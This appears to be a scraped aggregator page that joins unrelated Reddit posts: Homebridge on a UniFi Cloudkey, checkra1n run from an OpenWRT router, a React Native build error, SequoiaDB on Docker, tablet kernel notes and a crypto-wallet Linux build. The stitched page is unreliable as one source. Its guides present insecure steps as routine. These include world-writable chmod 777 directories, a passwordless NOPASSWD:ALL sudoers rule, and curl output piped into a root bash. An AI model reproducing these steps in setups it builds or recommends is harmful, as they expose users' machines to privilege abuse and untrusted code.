Chmod 777: A Definitive Guide To File Permissions

[Guide] Homebridge UniFi Cloudkey v1 (07/2020)

A small preface: after a lot of trial and error I finally managed to install Homebridge + Config UI X on a UniFi Cloudkey V1. I spent many hours of testing to get Homebridge running correctly. First I followed a guide from Ro3lie, and this was partly successful, but NodeJS was version 10.x and the service (running Homebridge as a service) was not working. NodeJS 10.x is not ideal for some Homebridge plugins (they need NodeJS 12.x), and because Homebridge was not running as a service, after a Cloudkey restart or a network issue you had to start it manually over SSH. I used Putty for the SSH connection and WinSCP to change some files, because I have/had almost no knowledge of NodeJS, coding, etc., so I used the combo of SSH and WinSCP.
This guide will install the following
Update Cloudkey Firmware and reset to factory defaults:
Uninstalling the UniFi Controller:
Changing the .list files:
Deb is used to indicate that we want to download indexes of binary packages. We also need to change and delete some files. For this part I used WinSCP (an SFTP client), but if you have more skills you can also do it from your SSH connection; if you want to do it with SSH, find the info in Ro3lie's guide. Open /etc/apt/sources.list, delete all the text inside, paste the following, and save the file:
deb http://deb.debian.org/debian buster main contrib non-free
deb-src http://deb.debian.org/debian buster main contrib non-free
deb http://deb.debian.org/debian-security/ buster/updates main contrib non-free
deb-src http://deb.debian.org/debian-security/ buster/updates main contrib non-free
deb http://deb.debian.org/debian buster-updates main contrib non-free
deb-src http://deb.debian.org/debian buster-updates main contrib non-free
Go to /etc/apt/sources.list.d/, where you will find three files; delete security.list and ubnt-unifi.list. Rename nodejs.list to nodesource.list. Open the file, again delete all the text inside, paste the following, and save the file:
deb https://deb.nodesource.com/node_12.x stretch main
deb-src https://deb.nodesource.com/node_12.x stretch main
Now run the following commands (from your SSH connection) and, after they're done, reboot the Cloudkey (run the command reboot from your SSH connection):
sudo apt-get update
sudo apt-get clean && sudo apt-get clean all && sudo apt-get autoclean && sudo apt-get update
Update Debian OS:
We first need to update to the newer Debian Buster 10.x; at this moment the Cloudkey is running Debian Jessie 8.x. Run the command sudo apt-get update && sudo apt-get upgrade. During the upgrade you may be asked what to do with the unattended-upgrades configuration file; choose 'Keep the local version currently installed'. When everything is done we need to delete some files we no longer use. Run the following commands:
rm /etc/apt/apt.conf.d/50unattended-upgrades.ucf-dist
sudo apt-get remove freeradius
sudo apt-get purge freeradius
Update NodeJS 6.x to 12.x:
sudo apt update
sudo apt -y install curl dirmngr apt-transport-https lsb-release ca-certificates
curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -
sudo apt -y install nodejs
To test if you have successfully installed NodeJS 12.x and NPM 6.x.x, run the commands node -v and npm -v.
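If the install worked, the output should look something like this (the version numbers here are only examples; your exact patch versions will differ):

node -v
v12.16.3
npm -v
6.14.4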
Install Homebridge + Config UI X and setup Homebridge as a service:
sudo npm install -g --unsafe-perm homebridge homebridge-config-ui-x
sudo hb-service install --user homebridge
At this point all the available files for Homebridge and the service are installed. Normally Homebridge would now be running as a service, but for some reason it doesn't, so we have to make some changes to get everything working. Use WinSCP and navigate to the file /etc/systemd/system/homebridge.service, delete all the text, paste the following, and save.
[Unit]
Description=Node.js HomeKit Server
After=syslog.target network-online.target

[Service]
Type=simple
User=homebridge
EnvironmentFile=/etc/default/homebridge
# Adapt this to your specific setup (could be /usr/bin/homebridge)
# See comments below for more information
ExecStart=/usr/bin/homebridge $HOMEBRIDGE_OPTS
Restart=on-failure
RestartSec=10
KillMode=process

[Install]
WantedBy=multi-user.target
Now do the same for /etc/default/homebridge: delete the text and paste the following.
# Defaults / Configuration options for homebridge
# The following setting tells homebridge where to find the config.json
HOMEBRIDGE_OPTS=-U /var/lib/homebridge -I

# If you uncomment the following line, homebridge will log more
# You can display this via systemd's journalctl: journalctl -f -u homebridge
# DEBUG=*

# To enable web terminals via homebridge-config-ui-x uncomment the following line
HOMEBRIDGE_CONFIG_UI_TERMINAL=1

We need to make some user-rights changes and move the config.json file to the /var/lib/homebridge folder. A few of these commands are not needed and will throw some errors; just ignore that and run them all.
sudo mkdir /var/lib/homebridge
sudo useradd --system homebridge
sudo chown -R homebridge:homebridge /var/lib/homebridge
sudo chmod 777 -R /var/lib/homebridge
sudo cp .homebridge/config.json /var/lib/homebridge/config.json
Start Homebridge as a service (run the following commands):
systemctl daemon-reload
systemctl enable homebridge
systemctl start homebridge
Homebridge is now running as a service and you can log in to UI-X using your Cloudkey's local IP address on port 8581. If you have a backup from another system you can just restore it at this point; after the restore is done, don't do anything else and follow the next steps...
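To confirm the service really is up (for example after a reboot), the standard systemd tools apply here; nothing about these is Homebridge-specific:

sudo systemctl status homebridge
sudo journalctl -f -u homebridge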
Homebridge SUDO rights using Visudo:
The last part is very important: we have to give the user homebridge sudo rights. If you don't do this last part correctly, you cannot update Homebridge, install packages, or use the log viewer in UI-X, because Homebridge doesn't have the correct rights. We are going to use visudo, a safe way to edit the sudoers file.
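The exact sudoers entry isn't shown in this post, so treat the following as an assumed sketch of the usual approach: run visudo and append a passwordless rule for the homebridge user.

sudo visudo
# Add this line at the end of the file (assumed entry, not from the original guide):
homebridge ALL=(ALL) NOPASSWD:ALL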
That's it! If you've done everything correctly, you now have a working Homebridge with UI-X running as a service on your UniFi Cloudkey! If someone reads this guide and thinks some changes are needed, please let me know. Special thanks to Ro3lie for his original guide and Jeroen Van Dijk for the great support with visudo! You can find both original guides that inspired this tutorial here and here.
submitted by AverageUser1337 to homebridge

[Tutorial] Run Checkra1n on any OpenWRT & Checkra1n compatible router (not just Linksys)

Don't try this on a main router, because you could permanently brick the router. Read through this entire post before starting and only attempt this if you're familiar with the terminal and you know what you're doing.
If you saw this post but don't have a Linksys router, you might still be in luck.

Requirements

Procedure

  1. Search for your router on the OpenWRT website and open the page for your router. On the page, look for the "Installation" heading, and download the "Firmware OpenWRT Install" for your router model.
  2. Download the appropriate Checkra1n binary from the Checkra1n website.
  3. Connect your computer to your router via ethernet and power on the router. You need the router's IP address; if you don't know what it is, find it first (it's typically your computer's default gateway). Visit that IP address in your browser, and if a web login is available, then you're good so far.
  4. Log in with your router username and password (if you've never changed the credentials, Google the default ones). After logging in, unplug any other cables from the router besides power and the ethernet cable connected to your computer. Look for a way to upload a custom firmware file, and upload the file you downloaded from OpenWRT. Upgrade to that firmware.
  5. Once that's done, visiting the router's IP (which is now 192.168.1.1) will take you to the OpenWRT login page. Log in with the username "root" and leave the password field blank.
    1. (Optional) If you would like, you can perform a software reset from within OpenWRT's webpage to prevent filesystem corruption. After you do that, log back into the router.
  6. Change the router's password. This is required for SSH access.
    1. (Optional) Enable wireless connections on your router from Network > Wireless. If you need help, check out this. If you do this, you won't need the Ethernet cable anymore.
  7. SSH into the router. (If you're on Windows, enable the built-in OpenSSH client first.) In CMD/Terminal, type ssh root@192.168.1.1. When it asks for the password, use the router password.
  8. Look for any directory with at least 20MB of free space. You can do this by typing the command df. The free directory will most likely be the /tmp directory. (Please note that the /tmp directory is cleared every time the router turns on.) Once you find a directory, type exit to close the SSH connection.
  9. You should be back in CMD/Terminal. Then, type this command to transfer the Checkra1n file to the router: scp PATH/TO/CHECKRA1N/FILE root@192.168.1.1:PATH/TO/FREE/DIRECTORY
  10. You're almost done; we need to adjust permissions now. SSH into the router again and type these commands: cd PATH/TO/FREE/DIRECTORY, then chmod 777 checkra1n
  11. Connect your iDevice via USB Port, and put it in iTunes Recovery Mode. Then type ./checkra1n -c -v
  12. Put the device into DFU Mode, and hopefully it boots jailbroken (if you see errors then press CTRL+C to stop checkra1n, and type ./checkra1n -c -v again since reliability is bad)
If you do use the /tmp directory, repeat steps 9-12 every time you power on your router
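Assuming the /tmp directory and the 192.168.1.1 default address, steps 8-12 condense to the following sequence (the checkra1n file name is whatever you downloaded):

df
exit
scp ./checkra1n root@192.168.1.1:/tmp
ssh root@192.168.1.1
cd /tmp
chmod 777 checkra1n
./checkra1n -c -v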
submitted by WishingTie09120 to jailbreak

Android build failed when using react native CLI - Resource linking failed: ZipArchive didn't find signature at start of LFH, Invalid APK offset

Hey friends, I've been trying to get my environment set up to develop React Native apps on my Linux machine but I couldn't figure out how to fix this error when I start to run it on my Android device/emulator.
I'm fairly new to React Native and this is my first time trying the React Native CLI instead of using Expo so any help would be very much appreciated.
It fails on Task :app:processDebugResources when 'installing the app' (after running npx react-native run-android), with error message
FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':app:processDebugResources'.
> A failure occurred while executing com.android.build.gradle.internal.tasks.Workers$ActionFacade
   > Android resource linking failed
     AAPT: W/ziparchive(68779): Zip: didn't find signature at start of lfh, offset=33511520
     error: failed to open APK: Invalid offset.

* Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

* Get more help at https://help.gradle.org

BUILD FAILED in 1s

error Failed to install the app. Make sure you have the Android development environment set up: https://reactnative.dev/docs/getting-started.html#android-development-environment. Run CLI with --verbose flag for more details.
Error: Command failed: ./gradlew app:installDebug -PreactNativeDevServerPort=8081
[... the Gradle failure above is repeated verbatim here ...]
    at makeError (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/execa/index.js:174:9)
    at /home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/execa/index.js:278:16
    at processTicksAndRejections (internal/process/task_queues.js:97:5)
    at async runOnAllDevices (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/@react-native-community/cli-platform-android/build/commands/runAndroid/runOnAllDevices.js:94:5)
    at async Command.handleAction (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/@react-native-community/cli/build/index.js:186:9)
where the ziparchive(XXXXX) numbers change each time. Please let me know if further output would help (i.e. with stacktrace or info flags).
For context, I've been following the React Native CLI Quickstart guide for Linux as the development OS and Android as the target OS. The distribution I'm using is Manjaro Linux with KDE Plasma on a Dell XPS 13 9360. The issue starts at the "Running your React Native application" section when running npx react-native run-android after starting the metro bundler (npx react-native start).
I believe it has to do with my environment and not the code as I am using the starter template when initializing the project and it builds fine when I tested it on some cloud service (https://appcenter.ms/).
Here is my system information when I run npx react-native info:
System:
  OS: Linux 4.19 Manjaro Linux
  CPU: (8) x64 Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz
  Memory: 2.70 GB / 7.52 GB
  Shell: 5.0.16 - /bin/bash
Binaries:
  Node: 13.8.0 - ~/.nvm/versions/node/v13.8.0/bin/node
  Yarn: 1.22.4 - /usr/bin/yarn
  npm: 6.13.6 - ~/.nvm/versions/node/v13.8.0/bin/npm
  Watchman: 4.9.0 - /usr/bin/watchman
SDKs:
  Android SDK: Not Found
IDEs:
  Android Studio: 3.6 AI-192.7142.36.36.6308749
Languages:
  Java: 1.8.0_242 - /usr/bin/javac
  Python: 3.8.2 - /usr/bin/python
npmPackages:
  @react-native-community/cli: Not Found
  react: 16.11.0 => 16.11.0
  react-native: 0.62.1 => 0.62.1
npmGlobalPackages:
  *react-native*: Not Found
What worries me is that the output above shows Android SDK: Not Found, but I see Android SDK Platform 28 when I go to Settings > Android SDK in Android Studio, and the corresponding folder exists in my Android home. The same goes for the Intel x86 Atom_64 System Image.
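For reference, the environment setup step in that guide amounts to exporting the SDK location, roughly like this in ~/.bashrc (the default ~/Android/Sdk path is an assumption here):

export ANDROID_HOME=$HOME/Android/Sdk
export PATH=$PATH:$ANDROID_HOME/emulator
export PATH=$PATH:$ANDROID_HOME/platform-tools

If ANDROID_HOME isn't exported in the shell that runs npx react-native info, the CLI can report the SDK as Not Found even when Android Studio sees it.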
I went through https://github.com/facebook/react-native/issues/23306 and tried
but unfortunately none of that worked for me.
I also found two forum threads with seemingly identical errors; however, neither of them was resolved.
Interestingly, I found an article explaining what the error may mean: https://www.fortinet.com/blog/threat-research/an-android-package-is-no-longer-a-zip.html
My understanding from that is that an incompatible Gradle may be causing the issue.
My android/gradle/wrapper/gradle-wrapper.properties has distributionUrl=https\://services.gradle.org/distributions/gradle-6.0.1-all.zip, and Android Studio's File > Project Structure > Project has the Gradle version set to 6.0.1.
Any insights? Any and all help is very much appreciated. Thanks!
submitted by stinkboye to reactnative

How to implement rapid deployment of SequoiaDB cluster with Docker


Container technology, represented by Docker and Rocket (rkt), is becoming more and more popular. It is changing the way companies and users create, publish, and use distributed applications, and it will bring real value to the cloud computing industry over the next five years. The reasons for its attractiveness are as follows:

1) Resource Independence and Isolation

Resource isolation is the most basic requirement of a cloud computing platform. Docker constrains hardware resources and the software runtime environment through Linux namespaces and cgroups, isolating each application from the others on the host machine so that they do not affect each other.

Different applications and services are "shipped" and "unshipped" with the container as the unit. Thousands of "containers" are arranged on the "container ship". Different companies and different kinds of "goods" (programs, components, operating environments, dependencies required to run applications) remain independent of each other.

2) Environmental Consistency

The development engineer builds a Docker image after finishing application development. Based on this image, the container is packed with all of its "goods" (programs, components, operating environment, dependencies required to run the application). No matter where the container ends up (development, test, or production environment), you can be sure the contents of the container are exactly the same: a software package will not be missing in the test environment, an environment variable will not be forgotten in production, and the application will not run abnormally because development and production installed different versions of a dependency. This consistency comes from the fact that everything is sealed into the "container" when the Docker image is built, and every stage transports this complete "container" without splitting and merging it.

3) Lightweight

Compared to traditional virtualization technology (VM), Docker's performance loss on CPU, memory, disk I/O, and network I/O is at the same level, and sometimes even better. The rapid creation, start-up, and destruction of containers has also received a lot of praise.

4) Build Once, Run Everywhere

This feature has attracted many people. When the "goods" (applications) are exchanged between "trucks", "trains", and "ships" (private clouds, public clouds, etc.), only the "docker container" conforming to the standard specifications and handling mode needs to be migrated, eliminating the time-consuming and labor-intensive manual "loading and unloading" (bringing applications online and offline) and producing huge time and labor cost savings. In the future this may allow just a few operators to run the container clusters behind ultra-large-scale online applications, just as a few crane operators in the 1960s could unload a 10,000-container ship in a few hours.

Container technology is now also widely used in the database field. Its "Build Once, Run Everywhere" feature greatly reduces the time spent installing and configuring a database environment, because even for DBAs who have worked with databases for many years, installing and configuring a database environment remains a seemingly simple but often complex task. Of course, the other advantages of container technology also carry over well to databases.

As an excellent domestic distributed NewSQL database, SequoiaDB has been recognized by more and more users. This article takes Docker as an example, focusing on how to quickly build a SequoiaDB image with a Dockerfile and how to use containers to quickly build and start a SequoiaDB cluster for an application system.

Build SequoiaDB image

How to install Docker and configure repositories is not the focus of this article; there are many related technical articles on the Internet. It should be pointed out that this article uses the Aliyun Repository, because the speed of uploading images to the official Docker repository is underwhelming. How to register and use the Aliyun Repository is covered in this article (http://www.jb51.net/article/123101.htm).

STEP 1: Create Dockerfile using following simple statements:
# Sequoiadb DOCKERFILES PROJECT
# --------------------------
# This is the Dockerfile for Sequoiadb 2.8.4
#
# REQUIRED FILES TO BUILD THIS IMAGE
# ----------------------------------
# (1) sequoiadb-2.8.4-linux_x86_64-enterprise-installer.run
# (2) installSDB.sh
#
# HOW TO BUILD THIS IMAGE
# -----------------------
# Put all downloaded files in the same directory as this Dockerfile
# Run:
#   $ sudo docker build -t sequoiadb:2.8.4 .

# Pull base image
FROM ubuntu

# Environment variables required for this build
ENV INSTALL_BIN_FILE="sequoiadb-2.8.4-linux_x86_64-enterprise-installer.run" \
    INSTALL_SDB_SCRIPT="installSDB.sh" \
    INSTALL_DIR="/opt/sequoiadb"

# Copy binaries
ADD $INSTALL_BIN_FILE $INSTALL_SDB_SCRIPT $INSTALL_DIR/

# Install SDB software binaries
RUN chmod 755 $INSTALL_DIR/$INSTALL_SDB_SCRIPT \
    && $INSTALL_DIR/$INSTALL_SDB_SCRIPT \
    && rm $INSTALL_DIR/$INSTALL_SDB_SCRIPT
The content of the installSDB.sh script are as follows:
chmod 755 $INSTALL_DIR/$INSTALL_BIN_FILE
$INSTALL_DIR/$INSTALL_BIN_FILE --mode unattended
rm $INSTALL_DIR/$INSTALL_BIN_FILE
echo 'service sdbcm start' >> /root/.bashrc
It should be noted that this example uses SequoiaDB Enterprise Edition 2.8.4. You can also download the Community Edition from the official SequoiaDB website (select the tar package, download and extract it) and replace the media name in this example. SequoiaDB website download address: http://download.sequoiadb.com/cn/

STEP 2: Create an image
The root user executes:
docker build -t sequoiadb:2.8.4 .
If you are a normal user, use sudo:
sudo docker build -t sequoiadb:2.8.4 .

STEP3: Login to Aliyun Repository
docker login --username=xxx registry.cn-hangzhou.aliyuncs.com
where xxx is the account you registered with Alibaba Cloud.

STEP4: View local SequoiaDB image id
docker images

STEP5: Mark local image and put it into Aliyun Repository
04dc528f2a6f is the author's local sequoiadb image id, registry.cn-hangzhou.aliyuncs.com is the Aliyun Repository address, 508mars is the author's name on Aliyun, sequoiadb is the image name, and latest is the tag.
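The tag-and-push commands themselves didn't survive in the post; given those values, they would look like this (the latest tag is assumed from the description):

docker tag 04dc528f2a6f registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb:latest
docker push registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb:latest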

Start SequoiaDB cluster with container

Docker’s network defaults to bridge mode, and containers in bridge mode have the following characteristics:
1) Containers in the same host can ping each other
2) Containers on different hosts cannot ping each other

However, a SequoiaDB cluster requires interoperability between all nodes, so if the SequoiaDB containers run on different hosts, Docker's default network mode is obviously inappropriate. There are many ways to solve the connectivity problem between containers on different hosts. This article only introduces the weave virtual network solution, because weave also provides a DNS server function: when deploying a SequoiaDB cluster with containers, it is no longer necessary to modify /etc/hosts inside each container, which greatly simplifies automated deployment.

STEP1: Install the weave network
curl -s -L git.io/weave -o /usr/local/bin/weave
chmod a+x /usr/local/bin/weave
It needs to be installed on all hosts; the author uses three virtual machines as hosts: sdb1, sdb2 and sdb3.

STEP2: Start the weave network
weave launch
The weave image will be downloaded the first time it is started.

STEP3: Download the SequoiaDB image from Aliyun Repository
docker pull registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb

STEP4: Create a docker mounted volume on all hosts
cd /home/sdbadmin
mkdir -p data/disk1 data/disk2 data/disk3
mkdir -p conf/local
chmod -R 777 data
chmod -R 777 conf
The location of the mounted volumes can be customized, but in general you need to create two types of volumes: one for storing the database data, such as data/disk1, data/disk2, and data/disk3, and the other for storing node configuration information, such as conf/local in this example. This way, even if a container is deleted by mistake, you can still start a new container to take over the role of the one that was accidentally deleted.

STEP5: Start the container
sdb1:
weave stop
weave launch
eval $(weave env)
docker run -dit --name sdbserver1 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb

sdb2:
weave stop
weave launch 192.168.17.132
eval $(weave env)
docker run -dit --name sdbserver2 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb

sdb3:
weave stop
weave launch 192.168.17.132
eval $(weave env)
docker run -dit --name sdbserver3 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb
192.168.17.132 is the IP address of sdb1, and 11810 is the externally exposed cluster access port. The volume on the host that stores the node configuration information must be mounted at the container's /opt/sequoiadb/conf/local directory. The volume that holds the table data can be mounted at a user-defined directory; however, once the cluster is created, it cannot be changed. The machine name must be specified when starting the container, because after the cluster is built the machine name is saved in SequoiaDB's system tables, and if a node's machine name is inconsistent with the system tables it will not be added to the cluster. When using weave, it is recommended to use the --name option; do not use --hostname to set the machine name, as the latter prevents weave from adding the machine name to its DNS server. Weave automatically sets the machine name from the value of --name, appends the weave.local domain to it, and adds it to the DNS server.

STEP6: Copy the script that creates the SequoiaDB cluster to the container:
docker cp create_cluster.js sdbserver1:/data
The content of create_cluster.js is as follows:
var array_hosts = ["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"];
var array_dbroot = ["/data/disk1/sequoiadb/database", "/data/disk2/sequoiadb/database", "/data/disk3/sequoiadb/database"];
var port_sdbcm = "11790";
var port_temp_coord = "18888";
var cataloggroup = {gname:"SYSCatalogGroup", gport:"11820", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]};
var array_coordgroups = [
  {gname:"SYSCoord", gport:"11810", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]}
];
var array_datagroups = [
  {gname:"dg1", gport:"11830", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}}
 ,{gname:"dg2", gport:"11840", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}}
 ,{gname:"dg3", gport:"11850", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}}
];
var array_domains = [
  {dname:"allgroups", dgroups:["dg1", "dg2", "dg3"], doptions:{AutoSplit:true}}
];

println("Starting the temporary coord node");
var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm);
oma.createCoord(port_temp_coord, array_dbroot[0]+"/coord/"+port_temp_coord);
oma.startNode(port_temp_coord);

println("Creating catalog node group: "+cataloggroup.ghosts[0]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport);
var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord);
db.createCataRG(cataloggroup.ghosts[0], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport);
var cataRG = db.getRG("SYSCatalogGroup");
for (var i in cataloggroup.ghosts) {
  if (i==0) {continue;}
  println("Creating catalog node: "+cataloggroup.ghosts[i]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport);
  var catanode = cataRG.createNode(cataloggroup.ghosts[i], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport);
  catanode.start();
}

println("Creating coord node group");
var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord);
var coordRG = db.createCoordRG();
for (var i in array_coordgroups) {
  for (var j in array_coordgroups[i].ghosts) {
    println("Creating coord node: "+array_coordgroups[i].ghosts[j]+" "+array_coordgroups[i].gport+" "+array_dbroot[0]+"/coord/"+array_coordgroups[i].gport);
    coordRG.createNode(array_coordgroups[i].ghosts[j], array_coordgroups[i].gport, array_dbroot[0]+"/coord/"+array_coordgroups[i].gport);
  }
}
coordRG.start();

println("Removing the temporary coord node");
var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm);
oma.removeCoord(port_temp_coord);

println("Creating data node groups");
var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport);
var k=0;
for (var i in array_datagroups) {
  var dataRG = db.createRG(array_datagroups[i].gname);
  for (var j in array_datagroups[i].ghosts) {
    println("Creating data node: "+array_datagroups[i].gname+" "+array_datagroups[i].ghosts[j]+" "+array_datagroups[i].gport+" "+array_dbroot[k]+"/data/"+array_datagroups[i].gport+" "+array_datagroups[i].goptions);
    dataRG.createNode(array_datagroups[i].ghosts[j], array_datagroups[i].gport, array_dbroot[k]+"/data/"+array_datagroups[i].gport, array_datagroups[i].goptions);
  }
  dataRG.start();
  k++;
}

println("Creating domains");
var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport);
for (var i in array_domains) {
  println("Creating domain: "+array_domains[i].dname+" "+array_domains[i].dgroups+" "+array_domains[i].doptions);
  db.createDomain(array_domains[i].dname, array_domains[i].dgroups, array_domains[i].doptions);
}
STEP7: Create the SequoiaDB cluster
docker exec sdbserver1 su - sdbadmin -c "sdb -f /data/create_cluster.js"

At this point the SequoiaDB cluster has been created and started; from now on, whenever the containers are started, the cluster starts automatically.

Conclusion

SequoiaDB uses container technology to achieve rapid cluster deployment, which greatly simplifies installation and deployment for beginners. Later, the author will also do some optimization of the SequoiaDB image build, because the image currently produced is a bit large. The main reason is that copying the installation media into the Docker image with ADD or COPY creates an intermediate layer; even though a later layer deletes the media, that intermediate layer still sits underneath, so the final image still carries its size. Thus, it is best to ADD a tar package (ADD decompresses automatically) or to download, build, and clean up inside a single RUN, as follows:
RUN mkdir -p /usr/src/things \
    && curl -SL http://example.com/big.tar.xz \
    | tar -xJC /usr/src/things \
    && make -C /usr/src/things all
submitted by sequoiadb to u/sequoiadb

v3 beta-R4 for Android 5.1.0 flo + deb

The new kernel release has been in test mode for 14 days (April 27 - May 11). 14 users participated in testing. During this time, this thread was set to non-public mode. All comments that were exchanged are attached below. To make the most sense of this info, you will want to read the comments bottom-up (chronological order). Start with "Initial release April 27 2015".
May 11, 2015 - Today I handed out install images to another 16 users and made this thread accessible to all users. Now 30 people in total are using this kernel on Android 5.1.0.
May 12, 2015 - Handed out 12 copies on request and 20 copies to old users and previous testers. 62 copies now delivered in total.
To request your kernel install images for 5.1.0, please send an email with the subject "request v3 beta-R4". You will find the two install images within 24 hrs (or so) in your personal folder. Please report your findings below. Thank you.
Safety exception: in the first week (until May 18), I will NOT deliver the new kernel to very new users (who have joined April 10 or after). (removed May 13.)
May 14, 2015 - Uploaded installers for all "deb" users.
May 18, 2015 - Uploaded installers for all "flo" users.
May 22, 2015 - 180+ users have downloaded R4 build 61 since April 27.
The installation procedure is the same as it ever was: after installing the target 5.1.0 Android release via factory image ("LMY47O"), you install a custom recovery (TWRP) via fastboot/bootloader. For this, your bootloader needs to be unlocked. You will then be able to install three files via recovery:
This is all you need to do.
Before you start upgrading, you should make a full backup of your current system in recovery. I strongly suggest you create your backup onto an external USB flash drive. TWRP can do this and it can also quickly and reliably restore from such a backup image. Please make use of this.
The new features are listed below (under "build 57").
Releases:
v3 beta-R4 build 61:
v3 beta-R4 build 58:
v3 beta-R4 build 57:
Android 5.1.0 improvements over 5.0.x:
Easycap drivers - old and new:
You need to edit your userinit.sh file (once), to tell the system which Easycap drivers to load. This way you can switch between the old and the new drivers.
To create userinit.sh for the old (legacy), single-file easycap driver:
su echo "insmod /system/vendoeasycap.ko" > /data/local/userinit.sh chmod 777 /data/local/userinit.sh 
To create userinit.sh for the new easycap stk1160 driver:
su echo "insmod /system/vendostk1160.ko" > /data/local/userinit.sh chmod 777 /data/local/userinit.sh 
The new EasyCap drivers support faster device initialization (cold start). However, the new EasyCap stk1160 driver does NOT seem to work with all stk1160-based devices.
The Sabrent Easycap and USBTV Easycap devices do NOT appear to be working well with the new drivers made available via this kernel release. You should consider getting a STK1160 based frame grabber device to use with this release. See my USBTV related remarks.
The new EasyCap drivers are using a different video pixel encoding compared to the old/legacy driver. As a result, when using the new drivers, you need to change the default video encoding in VCam from YUYV to UYVY (once).
On first run, VCam will start up in PAL mode. If you are using a NTSC camera, you will need to switch VCam from PAL to NTSC (once).
Read: Automatic rear camera: 3 options
On-power CPU Governor:
This setting allows you to select different power saving modes (aka CPU underclocking).
The ability to switch CPU modes is a standard Linux kernel feature.
Here you can find more detailed CPU Governor info.
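For reference, governor switching is exposed through the kernel's generic cpufreq sysfs interface, not anything specific to this release; as root (paths assume cpu0):

cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors
echo ondemand > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor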
If you don't care for underclocking, just leave the default "interactive" setting selected. Most people may not need to change this ever.
I make this functionality available, because what looks like a reliable fixed power line to the tablet, may not be so very constant and reliable, if you are using your tablet in the car (or something similar). The assumption (of stock Android), that you want to run interactive mode, only because there is external power available, may be wrong.
I am myself using "ondemand" mode for now and I really don't feel much of difference. However, I assume the CPU's to run a little cooler overall. And I expect the 3D-navigation app, that I run for hours, to eat up less power overall, etc.
The "powersave" setting will not be of much interest to most people. It may be useful on some very hot days, I don't know. This is something some people may want to try. But probably not.
The Nexus 7 kernel does not support "conservative" mode. This may be a Snapdragon thing, I'm not sure. I know that other Android chipsets do support "conservative" mode also.
"Performance" is also not supported - at all. This setting only makes sense on servers. But I'm not even sure about this.
It's called "On power CPU Governor", because this setting only affects the CPU mode, when external power is attached. The battery driven mode is not influenced by this setting. On battery power, the tablet will behave 100% stock.
Btw, my desktop PC is practically always running in "ondemand" mode.
Previous v3 features
Users who are upgrading from v2.0/4.4.4 straight to v3/5.1.0 should at least take a brief look at the top messages of previous v3 releases: v3 beta-R1, v3 beta-R2 and v3 beta-R3.
submitted by timur-m to timurskernel

Build your wallets on a flash drive with a live Linux OS

You will need to customize your build to suit your needs, but I picked wallets of the major currencies. For example, I picked Jaxx because it provides anonymous addresses for multiple currencies that can be used to move funds and accept funds without giving personal details. I attempted to provide reliable source information but make no claims about the security of any of these applications. Be sure to research the tools used in your build. This is just a good framework for building a portable wallet with "pretty good security". It provides a means to build portable wallets and hardware wallets, and to back up your build to DVD for loss prevention, with all of it, backups included, password protected and encrypted.
Install a debian type distribution to a flash drive. 8GB will work, but 32GB or 64GB will provide some additional space to work with. These instructions will work for Debian, Ubuntu, Mint, or any other related distribution.
The installation instructions are easy to follow, but during the installation phase I would recommend configuring grub to install to the flash drive rather than the main drive of the computer during the creation of the partitions. Also, encrypt your home folder to prevent casual browsing of the files from some other operating system.
Detailed instructions for your version of Linux can be found easily by searching for "install linux version to flash drive".
Install Debian
Install Mint
Install Ubuntu
Applications and app images can be installed to your home folder and those contents will be protected from observation if the drive is lost.

Your system can also be protected from loss with Pinguy Builder.

If you are careful about what is installed it is easy to build a wallet that will fit on a DVD. Keep the fat down to a minimum and a backup can be built with Pinguy Builder.
Pinguy Builder is currently hosted in Sourceforge website. Head over to the following URL and download the latest Pinguy Builder version.
Download Pinguy Builder
First install Gdebi package. Gdebi will take care of all necessary dependencies while installing a software.
$ sudo apt-get install gdebi
Go to the download location, and then install Pinguy Builder as shown below.
$ sudo gdebi pinguybuilder_4.3-6_all-beta.deb

CryptoCurrency Linux Build

Install wget

$ sudo apt-get install wget

Install Gdebi Package Manager

$ sudo apt-get install gdebi
$ sudo dpkg -i FileName.deb
$ sudo apt-get install -f

Install FUSE (runs GitHub AppImages)

$ sudo apt-get install fuse
$ sudo modprobe fuse
$ sudo groupadd fuse
user="$(whoami)"
